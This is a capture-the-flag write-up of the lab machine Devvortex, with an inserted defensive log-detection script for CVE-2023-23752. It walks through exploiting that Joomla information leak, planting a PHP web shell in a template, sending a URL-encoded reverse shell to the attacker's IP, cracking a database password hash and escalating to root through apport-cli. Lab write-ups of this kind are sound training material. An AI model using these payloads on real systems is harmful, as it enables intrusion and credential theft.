Target IP: 10.129.229.146
Challenge Description: N/A.
Performing a port scan using the command sudo nmap -sS 10.129.229.146 -p- returns the result shown above. According to the scan above, there are two TCP ports open on the target machine.
I performed an aggressive port scan against the target machine using the command sudo nmap -sV -A 10.129.229.146 -p 22,80 and obtained the result shown above. I notice the HTTP request gets directed to http://devvortex.htb. Therefore, I will insert this hostname inside my /etc/hosts file. Time to perform a subdomain search using ffuf.
Using the command ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.devvortex.htb" -u http://devvortex.htb -fs 154, I performed a subdomain search and identified the subdomain dev.devvortex.htb as shown above. Time to insert this new subdomain name inside my /etc/hosts file.
Now my /etc/hosts file contains the entry shown above. Time to perform enumeration.
Port 80: HTTP (dev.devvortex.htb)
While performing a directory search against this subdomain using the command gobuster dir -u http://dev.devvortex.htb -w /usr/share/wordlists/dirb/big.txt -x html,php,txt, I identified an interesting entry with the name /README.txt. Browsing to this page shows the information above. By the looks of it, the target machine is running Joomla CMS. But what version is it? Time to find out.
____ _____ _____ __ __ ___ ___ __ _ _
(_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( )
.-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) (
\____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)
(1337.today)
--=[OWASP JoomScan
+---++---==[Version : 0.0.7
+---++---==[Update Date : [2018/09/23]
+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo
--=[Code name : Self Challenge
@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP
Processing http://dev.devvortex.htb ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 4.2.6
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://dev.devvortex.htb/administrator/
[+] Checking robots.txt existing
[++] robots.txt is found
path : http://dev.devvortex.htb/robots.txt
Interesting path found from robots.txt
http://dev.devvortex.htb/joomla/administrator/
http://dev.devvortex.htb/administrator/
http://dev.devvortex.htb/api/
http://dev.devvortex.htb/bin/
http://dev.devvortex.htb/cache/
http://dev.devvortex.htb/cli/
http://dev.devvortex.htb/components/
http://dev.devvortex.htb/includes/
http://dev.devvortex.htb/installation/
http://dev.devvortex.htb/language/
http://dev.devvortex.htb/layouts/
http://dev.devvortex.htb/libraries/
http://dev.devvortex.htb/logs/
http://dev.devvortex.htb/modules/
http://dev.devvortex.htb/plugins/
http://dev.devvortex.htb/tmp/
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/dev.devvortex.htb/
Using the tool joomscan and the command joomscan -u http://dev.devvortex.htb, I obtained the result shown above. The target machine is running Joomla 4.2.6 as shown above. This tool also identified interesting directories. Although the tool states there are no vulnerabilities for this version, I will need to search further.
And bingo! I searched for Joomla 4.2.6 vulnerability on Google and identified multiple results shown above. According to the results, it looks like this version suffers from an information disclosure vulnerability. The CVE identifier for this vulnerability is CVE-2023-23752, as shown above.
I also managed to find a verified exploit for this vulnerability at https://www.exploit-db.com/exploits/51334 using Exploit Database, as shown above. Time to make a copy of the exploit on my machine and run it against the target machine's web application. Since the tool is created in Ruby, I will search for a Python exploit instead.
Searching for a working exploit on GitHub for the vulnerability, I found the repository shown above. I made a copy of the exploit on my machine under the name exp.py. Time to test it :)
I ran the exploit using the command python3 exp.py. Then I used mode 1 and targeted the hostname http://dev.devvortex.htb and got a hit, as shown above. This exploit successfully disclosed the credentials lewis:P4ntherg0t1n5r3c0n##.
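The disclosure above comes from Joomla's web-service API: in the affected versions (fixed in Joomla 4.2.8) an unauthenticated request to /api/index.php/v1/config/application?public=true returns the site configuration, database credentials included, and /api/index.php/v1/users?public=true returns the user list. As an added example, not code from the writeup or from the exploit repository it uses, here is a small Python detector for a defender reviewing web-server access logs: it parses lines in the combined log format (the sample lines are constructed here; the 10.10.14.112 address is the attacker's from the writeup, 192.0.2.7 is a documentation address) and flags every unauthenticated hit on those two endpoints, noting whether the server answered 200 (data most likely leaked) or rejected the request (a probe against a patched site).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# API routes exposed without authentication by CVE-2023-23752 (Joomla 4.0.0 - 4.2.7).
SENSITIVE_ENDPOINTS = {
    "/api/index.php/v1/config/application": "site configuration (includes database credentials)",
    "/api/index.php/v1/users": "user list",
}

# Constructed sample log lines for the demonstration (not taken from the target machine).
SAMPLE_LOG = """\
10.10.14.112 - - [01/Jan/2024:10:00:01 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1273 "-" "python-requests/2.31"
10.10.14.112 - - [01/Jan/2024:10:00:02 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 842 "-" "python-requests/2.31"
192.0.2.7 - - [01/Jan/2024:10:01:15 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.7 - - [01/Jan/2024:10:01:16 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 401 88 "-" "curl/8.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def classify_request(target):
    """Return a description of what the request exposes, or None if it is not a CVE-2023-23752 probe.

    Only requests carrying public=true are flagged: that parameter is what bypasses the
    authentication check, so a request without it is an ordinary (authenticated) API call.
    """
    parts = urlsplit(target)
    path = parts.path.rstrip("/")
    if path not in SENSITIVE_ENDPOINTS:
        return None
    public = parse_qs(parts.query).get("public", ["false"])[0]
    if public.lower() != "true":
        return None
    return SENSITIVE_ENDPOINTS[path]


def detect_joomla_api_probes(log_text):
    """Scan log text and return one finding per unauthenticated hit on a sensitive endpoint."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        exposed = classify_request(rec["target"])
        if exposed is None:
            continue
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "target": rec["target"],
            "status": rec["status"],
            "exposed": exposed,
            # A 200 means the vulnerable code path answered and the data left the server.
            "data_returned": rec["status"] == 200,
        })
    return findings


if __name__ == "__main__":
    for f in detect_joomla_api_probes(SAMPLE_LOG):
        verdict = "LEAKED" if f["data_returned"] else "blocked"
        print(f"{f['time']} {f['ip']} {f['target']} -> {f['status']} [{verdict}] {f['exposed']}")
```

A 200 on the config endpoint should be treated as a credential exposure: rotate the database password and any password reused from it (the writeup later shows the same password opening the MySQL service), then patch.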
From previous enumeration, I identified the administrator page of Joomla is at http://dev.devvortex.htb/administrator. Maybe I can use the credentials here? Time to find out.
And bingo! I successfully logged into the administrator panel using the credentials disclosed via the exploit, as shown above. Since this user lewis is the administrator on this CMS, I will need to find a vector to obtain a foothold on the target machine. This is doable by overwriting one of the template files with a shell to obtain a reverse shell connection.
I browsed to the System menu first. This is where the Site Templates are located, as shown above.
I notice the target machine is using the Cassiopeia template, as shown above. Time to overwrite one of the PHP files inside this template and insert my PHP web shell to obtain a reverse shell connection.
I decided to overwrite the error.php, as shown above.
I inserted the PHP code system($_GET['totally_not_a_sh3ll']); as shown above inside the error.php. Now I should be able to access my web shell. Time to test it.
And bingo! I browsed to http://dev.devvortex.htb/templates/cassiopeia/error.php?totally_not_a_sh3ll=id;whoami;ls and ran the commands id;whoami;ls and obtained the result shown above. My web shell is working successfully. Time to obtain a reverse shell connection now using this web shell.
I started a listener on my machine at port 8443. Then I deployed the URL-encoded PHP reverse shell code php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.14.112%22%2C8443%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the web shell and obtained a reverse shell connection as shown above. Now I have a foothold on the target machine with the session as www-data :) Then I upgraded my shell to a pty shell via python using the command python -c 'import pty; pty.spawn("/bin/bash")'.
From previous enumeration, I identified there is a database application running on the target machine. I decided to test the credentials I obtained via the exploit and obtained a session, as shown above. The command I used is mysql -h localhost -u lewis -p'P4ntherg0t1n5r3c0n##'. Then I ran the command show databases; and identified the database joomla. Maybe I can obtain interesting information inside this database? I used the command use joomla; to switch to this database.
Using the command select * from sd4fg_users;, I obtained the two entries shown above. Since one of the hosts on the target machine is a user called logan, maybe cracking the password hash shown above can help? I saved the password hash $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 of the user logan on my machine inside a file called hash to crack it using john.
To crack the hash, I used the command john hash --wordlist=/usr/share/wordlists/rockyou.txt. I successfully obtained the password tequieromucho belonging to the user logan, as shown above.
Using su logan and the new password tequieromucho, I was able to successfully switch to the user logan as shown above. I successfully escalated my privileges from www-data to logan horizontally.
Running sudo -l returns the entry (ALL : ALL) /usr/bin/apport-cli. The binary apport-cli is executable as root. I did a Google search for this binary and obtained multiple privilege escalation techniques, one being the vulnerability with the CVE id CVE-2023-1326.
Obtaining a root shell was pretty simple. I followed the instructions at https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00. GG. This challenge was a lot of fun and the privilege escalation was a joy.
The two flags are shown above.